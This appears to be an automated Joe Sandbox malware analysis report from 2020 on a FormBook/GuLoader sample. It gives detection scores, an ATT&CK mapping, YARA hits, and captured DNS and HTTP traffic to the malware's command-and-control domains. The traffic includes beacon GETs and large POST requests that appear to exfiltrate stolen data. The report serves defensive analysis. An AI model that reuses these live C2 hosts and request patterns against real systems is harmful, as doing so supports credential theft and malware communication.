Loading ...

Play interactive tourEdit tour

Analysis Report #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.bin

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:219336
Start date:01.04.2020
Start time:02:48:26
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 19m 57s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.bin (renamed file extension from bin to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:28
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.troj.spyw.evad.winEXE@35/12@49/5
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 57.3% (good quality ratio 51.2%)
  • Quality average: 73.3%
  • Quality standard deviation: 31.6%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 166
  • Number of non-executed functions: 284
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12, 2.18.68.82, 67.26.75.254, 8.241.121.126, 67.27.157.254, 67.27.159.126, 67.26.137.254, 67.26.83.254, 67.27.157.126, 8.253.207.120, 8.253.95.249, 93.184.221.240, 2.20.143.16, 2.20.143.23, 205.185.216.42, 205.185.216.10
  • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, au.download.windowsupdate.com.edgesuite.net, odc-dm-files-geo.onedrive.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, odc-dm-files-brs.onedrive.akadns.net, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, cds.d2s7q6s2.hwcdn.net
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook GuLoader
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Registry Run Keys / Startup Folder21Process Injection512Software Packing1Credential Dumping1Security Software Discovery221Remote File Copy3Man in the Browser1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExecution through Module Load1Port MonitorsAccessibility FeaturesDeobfuscate/Decode Files or Information1Input Capture1System Network Connections Discovery1Remote ServicesData from Local System1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesGraphical User Interface1Accessibility FeaturesPath InterceptionScripting11Input CaptureFile and Directory Discovery2Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information2Credentials in FilesSystem Information Discovery13Logon ScriptsInput Capture1Data EncryptedStandard Application Layer Protocol14SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading1Account ManipulationVirtualization/Sandbox Evasion12Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion12Brute ForceProcess Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection512Two-Factor Authentication InterceptionRemote System Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionIndicator BlockingBash HistorySystem Network Configuration Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: http://www.allixanes.com/sa22/Virustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeVirustotal: Detection: 26%Perma Link
Source: #Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeReversingLabs: Detection: 38%
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000005.00000002.936093552.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.896346552.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.931730236.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000001A.00000002.1277253347.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000001A.00000002.1282450545.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.890369559.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000000.901044828.000000000D3B2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000C.00000002.914336084.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000C.00000002.922687997.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 1.2.#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe.2360000.0.unpackAvira: Label: TR/Dropper.Gen
Source: 24.2.gdi4hxdb6.exe.2390000.1.unpackAvira: Label: TR/Dropper.Gen

Networking:

barindex
Tries to resolve many domain names, but no domain seems validShow sources
Source: unknownDNS traffic detected: query: www.xiangkanla.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.24protrade.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.amroech.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.augmentedgame.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.usmantechstaffing.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.c36c.loan replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.lisacinsy.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.iloveposts.us replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.sspifgmcputactn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.carlekblad.net replaycode: Name error (3)
Source: unknownDNS traffic detected: query: www.rmk8.com replaycode: Name error (3)
Uses netstat to query active network connections and open portsShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Domain name seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDomain Name: www.allixanes.com www.allixanes.com
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=aVqR6HBe4HPb3lExG0zvWIwAu17MGRwlbJLJc79qbxuvrCEeo+JL0PcaWaEsBxFMbHEl&aBR=nzuD_jr HTTP/1.1Host: www.breeze-iwaki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=JMM0tJynmL2eFOFZA7GZSDXDp6JdgYgBE5qXu9CROMtt3yZ3f8zQfhoL7xY9xPLh1bda&aBR=nzuD_jr HTTP/1.1Host: www.allixanes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=NsNsxeBPlrPiTgS9PP58UUflimdpAUL5lqUDkgQyH8o5OCzmy0StWinhpygoIu1EeSbM&aBR=nzuD_jr HTTP/1.1Host: www.ontariobrokers.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=B5PZdHLghsUOEGl3YThmAxwc5Q2JZtslVwuxmQEXEBgCU6TSZbpNnkclXQwV4rvxtjxB&aBR=nzuD_jr HTTP/1.1Host: www.zhiguohulian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=mJWPVSoyqfPZs8UJSkt9FmfqvIPNq9yK3Wcj61pPIQpPL4OfnZhXtLvw2+R7wcITKeuf&aBR=nzuD_jr HTTP/1.1Host: www.unitedgamesreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=aVqR6HBe4HPb3lExG0zvWIwAu17MGRwlbJLJc79qbxuvrCEeo+JL0PcaWaEsBxFMbHEl&aBR=nzuD_jr HTTP/1.1Host: www.breeze-iwaki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=JMM0tJynmL2eFOFZA7GZSDXDp6JdgYgBE5qXu9CROMtt3yZ3f8zQfhoL7xY9xPLh1bda&aBR=nzuD_jr HTTP/1.1Host: www.allixanes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 50.63.202.45 50.63.202.45
Source: Joe Sandbox ViewIP Address: 50.63.202.45 50.63.202.45
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.allixanes.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.allixanes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.allixanes.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 42 75 41 4f 7a 73 53 72 35 76 4f 66 63 38 39 38 62 62 62 6a 43 55 50 5a 67 36 31 30 70 37 4d 51 55 50 50 53 7a 71 4b 4d 4e 4e 77 6f 33 79 52 6e 57 65 4b 47 54 30 45 53 68 52 74 46 38 36 33 4d 6c 61 56 58 44 4d 76 62 77 79 57 6f 65 7a 51 55 69 44 35 43 74 75 74 63 41 37 32 31 38 4f 54 44 52 43 4c 4b 36 52 67 31 72 5f 6a 76 37 6c 48 73 78 6a 4b 4c 4c 42 62 62 42 4d 36 32 35 43 31 34 69 2d 30 33 6e 38 56 45 65 72 50 61 4b 65 6d 36 6f 41 67 78 78 76 75 57 44 59 34 5a 48 79 34 66 54 38 69 75 52 6e 6f 62 53 31 54 41 77 5f 7e 70 37 78 35 6f 45 77 44 51 71 6a 34 4c 62 56 58 57 42 54 64 51 65 6b 65 39 51 58 37 56 34 66 6e 39 6c 4d 4d 76 4a 34 45 64 4f 31 51 4e 74 4e 37 4e 6d 33 41 41 4b 2d 4d 78 34 4f 33 41 67 44 54 5f 68 52 59 74 61 79 30 75 59 45 31 4b 65 4f 33 58 48 42 4d 32 6a 54 36 54 7e 4f 55 63 44 5a 65 61 72 57 39 51 43 59 6b 42 56 44 7e 73 28 37 76 39 56 5f 6f 45 47 62 75 74 33 5f 71 77 4e 74 46 67 64 38 73 39 6c 54 43 62 56 59 61 38 63 5a 28 75 57 44 76 2d 77 49 31 63 64 65 77 39 30 45 42 41 70 6a 54 5f 47 51 46 4f 39 73 49 54 30 37 30 68 44 6b 37 4c 77 44 43 30 6e 51 6f 51 75 51 69 6b 4f 4c 37 6b 53 58 7e 39 6c 2d 77 2d 58 7a 6e 6f 5a 4e 64 48 73 63 7e 32 54 4e 78 49 64 71 49 6d 35 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: xL3hLB=BuAOzsSr5vOfc898bbbjCUPZg610p7MQUPPSzqKMNNwo3yRnWeKGT0EShRtF863MlaVXDMvbwyWoezQUiD5CtutcA7218OTDRCLK6Rg1r_jv7lHsxjKLLBbbBM625C14i-03n8VEerPaKem6oAgxxvuWDY4ZHy4fT8iuRnobS1TAw_~p7x5oEwDQqj4LbVXWBTdQeke9QX7V4fn9lMMvJ4EdO1QNtN7Nm3AAK-Mx4O3AgDT_hRYtay0uYE1KeO3XHBM2jT6T~OUcDZearW9QCYkBVD~s(7v9V_oEGbut3_qwNtFgd8s9lTCbVYa8cZ(uWDv-wI1cdew90EBApjT_GQFO9sIT070hDk7LwDC0nQoQuQikOL7kSX~9l-w-XznoZNdHsc~2TNxIdqIm5A).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.allixanes.comConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.allixanes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.allixanes.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 42 75 41 4f 7a 75 7a 53 37 66 37 52 57 65 56 30 4b 4d 36 46 46 45 6e 62 69 4a 5a 34 33 63 34 45 57 64 37 5a 7a 71 61 51 46 76 46 76 6d 44 68 6e 51 64 69 42 61 30 46 67 6a 52 74 43 32 61 7a 65 73 70 56 66 44 4e 36 4d 77 79 65 72 55 52 35 5f 69 7a 35 56 73 4f 78 77 45 4e 62 72 38 4d 58 32 66 48 54 6f 71 67 63 31 79 50 37 74 33 67 6a 7a 68 53 47 4f 49 78 76 44 44 4d 69 64 35 79 5a 41 6a 64 49 65 76 64 4a 47 62 5a 53 58 47 5f 58 66 76 58 45 45 73 76 36 56 4d 37 46 48 4a 77 41 62 65 64 69 41 4e 32 6f 63 63 57 6a 65 33 34 62 63 74 77 73 65 47 67 54 45 71 67 59 39 59 57 79 51 46 52 34 66 63 56 53 54 49 31 58 62 6d 59 47 6f 76 6f 73 57 50 37 4e 5f 52 45 67 4b 70 63 58 63 72 56 35 4e 48 5f 6b 43 37 5f 37 63 34 44 44 58 6d 43 30 6c 53 53 45 42 56 6e 6c 64 48 4b 43 55 45 44 68 6e 75 54 37 31 38 4f 55 51 49 4a 66 6a 75 57 4a 48 45 4a 55 5f 5a 6b 6a 72 28 76 65 68 5a 63 63 32 62 71 71 57 31 50 71 30 44 35 70 49 5a 74 34 32 76 7a 6e 71 47 49 61 7a 58 36 58 70 57 44 75 50 77 4d 67 33 62 76 6b 39 32 52 55 63 71 41 37 7a 58 41 45 4d 37 38 34 52 74 35 67 78 44 6b 6a 4c 77 33 50 68 6d 6a 49 51 6b 68 53 6e 4f 71 37 6b 52 6e 7e 39 70 65 78 64 59 69 57 32 57 36 31 6f 67 39 54 32 63 5a 73 32 59 72 5a 32 74 70 32 42 72 31 69 6a 54 42 39 68 78 71 48 39 41 62 76 77 4d 36 70 54 58 34 42 31 49 36 64 52 44 63 35 4a 43 37 5a 75 75 42 6f 53 4e 32 34 42 33 30 67 64 43 39 56 71 74 4d 53 51 77 70 6c 68 51 47 39 30 57 38 4d 45 56 49 47 66 35 72 50 48 57 4b 61 53 47 71 42 54 44 61 42 55 7a 6e 43 52 65 6a 61 6d 56 65 28 56 48 57 5a 70 34 64 46 31 72 49 55 77 55 6f 67 44 53 74 50 72 6f 62 79 5f 35 6c 71 41 32 6d 61 32 44 77 6a 76 51 79 4e 57 45 62 37 74 4a 4b 58 43 78 47 62 44 6c 51 31 42 44 62 43 63 6c 44 4d 69 47 52 44 6b 74 34 32 67 35 39 69 43 49 48 28 6e 57 71 42 59 64 66 67 36 5a 4c 4c 4a 38 51 71 70 72 30 53 5a 67 45 34 5f 39 75 31 61 78 57 48 32 39 59 38 73 73 74 4e 6a 33 46 6e 4a 73 4d 4b 6b 4b 74 53 62 35 32 35 32 4b 4c 4b 50 51 75 51 69 42 49 41 79 78 41 59 42 64 76 70 75 41 7a 37 48 4d 76 6a 64 44 61 59 64 36 73 4c 2d 46 53 38 62 74 4a 68 4b 49 36 38 37 50 79 67 37 76 4d 6d 44 6d 76 67 43 7a 4a 51 50 68 45 75 61 30 2d 53 54 58 38 61 76 75 78 39 45 55 59 35 63 66 31 58 59 76 6d 59 4f 66 76 6a 69 6e 58 41 52 50 58 73 6e 43 66 62 51 33 7a 35 75 6f 6c 6a 66 66 4e 50 6e 45 61 63 47 61 31 46 34 28 68 58 52 59 50 56 6b 7e 46 72 52 75 55 6b 4f 62 4d 54 39 38 57 46 55 37 4f 6e 43 7e 32 4f 52 50 62 54 42 50 6d 51 43 4a 58 31 7a 50 46 51 77 77 75 45 55 71 53 62 6b 43 72 38 6e 6d 57 41 6a 68 54 39 78 69 45 56 4c 45 30 74 55 30 47 79 70 66 65 49 4c 69 63 42 55 57 71
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c 72 49 4f 4a 63 5f 50 4f 63 78 36 32 44 7a 4f 31 39 76 77 6a 55 55 28 78 43 6b 35 6d 49 53 45 77 46 4b 65 75 50 61 36 4c 4b 6b 59 42 6b 41 78 74 75 35 45 58 41 2d 72 70 5a 62 72 35 4b 78 38 70 35 43 30 42 41 31 65 69 34 35 36 54 59 51 4e 59 62 79 70 4e 6e 70 28 44 43 63 36 69 77 32 51 47 76 62 6d 33 4e 68 69 75 39 62 32 6d 43 4f 28 58 6d 51 30 6d 79 48 4e 39 43 4e 6f 43 72 55 51 59 6c 47 55 42 38 6e 71 4d 51 61 56 49 6a 52 4f 66 70 65 63 76 71 4b 28 33 31 70 35 75 70 54 4e 65 78 61 56 75 53 39 65 4a 45 73 4f 33 33 65 76 49 35 32 66 4c 5a 52 52 68 45 59 72 69 70 57 74 69 71 65 7e 30 39 46 47 54 65 56 77 77 58 51 61 53 5a 4f 70 35 41 78 72 67 74 48 32 4b 4a 6f 31 79 63 55 50 49 57 54 34 53 63 66 4b 62 6f 54 44 63 53 5f 4b 4e 7a 56 53 49 47 71 57 39 64 61 39 4e 73 70 56 48 43 51 41 46 53 6b 35 41 77 4e 6a 44 68 46 39 30 39 64 62 73 74 5a 74 53 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cLrIOJc_POcx62DzO19vwjUU(xCk5mISEwFKeuPa6LKkYBkAxtu5EXA-rpZbr5Kx8p5C0BA1ei456TYQNYbypNnp(DCc6iw2QGvbm3Nhiu9b2mCO(XmQ0myHN9CNoCrUQYlGUB8nqMQaVIjROfpecvqK(31p5upTNexaVuS9eJEsO33evI52fLZRRhEYripWtiqe~09FGTeVwwXQaSZOp5AxrgtH2KJo1ycUPIWT4ScfKboTDcS_KNzVSIGqW9da9NspVHCQAFSk5AwNjDhF909dbstZtSAg).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 4c 67 36 73 4d 57 52 54 64 4f 61 41 53 7e 65 4d 31 66 6d 34 71 52 46 52 6d 6a 34 48 6b 6f 7a 43 68 6b 4a 4a 36 36 58 45 35 47 59 4f 48 38 46 6c 46 64 6c 79 6f 45 55 66 65 7a 72 50 4c 62 75 4f 41 70 4f 71 6a 45 56 41 79 44 61 28 50 36 43 53 33 4e 51 61 44 6c 6a 28 4c 54 42 48 64 37 68 30 31 70 6c 74 59 4f 59 42 45 66 79 36 4c 72 38 48 4c 36 53 69 43 45 4e 30 32 52 70 52 35 6b 2d 72 48 64 56 73 6e 6b 75 6d 51 32 6c 4a 37 35 41 6b 54 43 74 6e 65 63 45 6f 4b 28 37 39 35 34 52 73 54 4a 52 31 4a 64 51 4b 75 50 43 45 5f 61 64 6b 73 72 32 39 55 69 39 66 78 52 39 51 34 36 56 76 45 42 35 76 5a 57 45 33 6c 47 51 61 58 6f 35 58 51 62 70 5a 4b 64 54 44 68 50 67 38 43 6a 4f 50 4c 4e 75 65 55 4f 55 56 44 6f 51 56 4a 6d 31 6f 54 62 63 54 4b 6d 33 79 69 4f 49 4d 63 79 2d 64 37 39 4e 69 35 56 48 62 41 42 72 64 6e 4d 4b 38 36 44 46 71 54 49 50 31 59 4f 67 68 4c 6b 57 61 57 73 6e 59 4c 46 7a 4a 5f 51 57 69 39 32 74 45 52 37 6b 50 45 7e 58 45 5a 68 69 66 4d 28 73 66 6a 54 6c 79 63 28 7a 31 44 56 75 35 76 7a 38 35 55 66 53 33 66 53 31 5a 4d 53 6d 28 70 56 71 6a 38 43 72 6c 69 66 56 4c 33 62 77 34 77 41 75 35 32 7a 48 34 38 43 34 28 51 66 52 35 7a 70 6f 6d 74 71 67 44 72 36 45 64 69 61 79 32 42 33 62 50 63 66 59 47 50 34 59 6f 56 4c 45 6d 4f 59 45 70 5f 7a 37 34 33 71 4e 66 44 55 65 49 68 61 4b 28 66 76 35 7e 4d 44 31 63 73 43 33 53 42 75 72 77 63 28 74 7e 44 49 77 4d 49 51 56 4f 4c 4e 55 47 58 75 6d 59 56 7a 74 6d 61 28 61 43 4d 69 6f 42 53 73 62 58 4d 38 71 71 41 42 62 35 78 31 49 43 79 64 46 63 47 67 37 61 51 55 38 59 53 70 4d 66 38 66 76 73 34 70 63 30 59 56 75 67 53 41 77 33 63 32 50 52 33 64 55 6c 6e 77 38 74 54 44 38 75 4f 65 63 4f 72 69 6a 50 53 38 58 6e 37 38 7a 6b 35 47 37 35 59 77 6b 7e 4e 63 35 45 4a 6e 43 35 6e 61 51 4d 47 33 4f 41 44 6c 36 4a 66 33 42 61 65 51 52 42 65 63 78 79 73 73 43 30 51 47 6d 28 74 62 38 73 51 65 6c 67 38 73 76 64 58 4c 4f 68 76 39 65 35 58 45 32 67 55 33 61 70 78 77 63 77 4e 37 51 33 36 61 6e 46 6f 64 4b 6c 68 6a 69 46 72 4b 35 5a 64 59 67 46 53 65 64 37 4c 61 62 79 70 49 33 69 4b 50 37 56 64 4e 2d 69 43 61 41 44 4f 33 4c 44 69 62 67 54 70 34 58 37 42 79 42 6d 37 6b 35 7a 4d 4d 2d 33 63 55 31 59 55 6b 4b 75 6d 59 36 7a 52 33 71 31 45 6b 35 77 33 38 48 5a 78 4c 65
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c 72 49 4f 4a 63 5f 50 4f 63 78 36 32 44 7a 4f 31 39 76 77 6a 55 55 28 78 43 6b 35 6d 49 53 45 77 46 4b 65 75 50 61 36 4c 4b 6b 59 42 6b 41 78 74 75 35 45 58 41 2d 72 70 5a 62 72 35 4b 78 38 70 35 43 30 42 41 31 65 69 34 35 36 54 59 51 4e 59 62 79 70 4e 6e 70 28 44 43 63 36 69 77 32 51 47 76 62 6d 33 4e 68 69 75 39 62 32 6d 43 4f 28 58 6d 51 30 6d 79 48 4e 39 43 4e 6f 43 72 55 51 59 6c 47 55 42 38 6e 71 4d 51 61 56 49 6a 52 4f 66 70 65 63 76 71 4b 28 33 31 70 35 75 70 54 4e 65 78 61 56 75 53 39 65 4a 45 73 4f 33 33 65 76 49 35 32 66 4c 5a 52 52 68 45 59 72 69 70 57 74 69 71 65 7e 30 39 46 47 54 65 56 77 77 58 51 61 53 5a 4f 70 35 41 78 72 67 74 48 32 4b 4a 6f 31 79 63 55 50 49 57 54 34 53 63 66 4b 62 6f 54 44 63 53 5f 4b 4e 7a 56 53 49 47 71 57 39 64 61 39 4e 73 70 56 48 43 51 41 46 53 6b 35 41 77 4e 6a 44 68 46 39 30 39 64 62 73 74 5a 74 53 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cLrIOJc_POcx62DzO19vwjUU(xCk5mISEwFKeuPa6LKkYBkAxtu5EXA-rpZbr5Kx8p5C0BA1ei456TYQNYbypNnp(DCc6iw2QGvbm3Nhiu9b2mCO(XmQ0myHN9CNoCrUQYlGUB8nqMQaVIjROfpecvqK(31p5upTNexaVuS9eJEsO33evI52fLZRRhEYripWtiqe~09FGTeVwwXQaSZOp5AxrgtH2KJo1ycUPIWT4ScfKboTDcS_KNzVSIGqW9da9NspVHCQAFSk5AwNjDhF909dbstZtSAg).
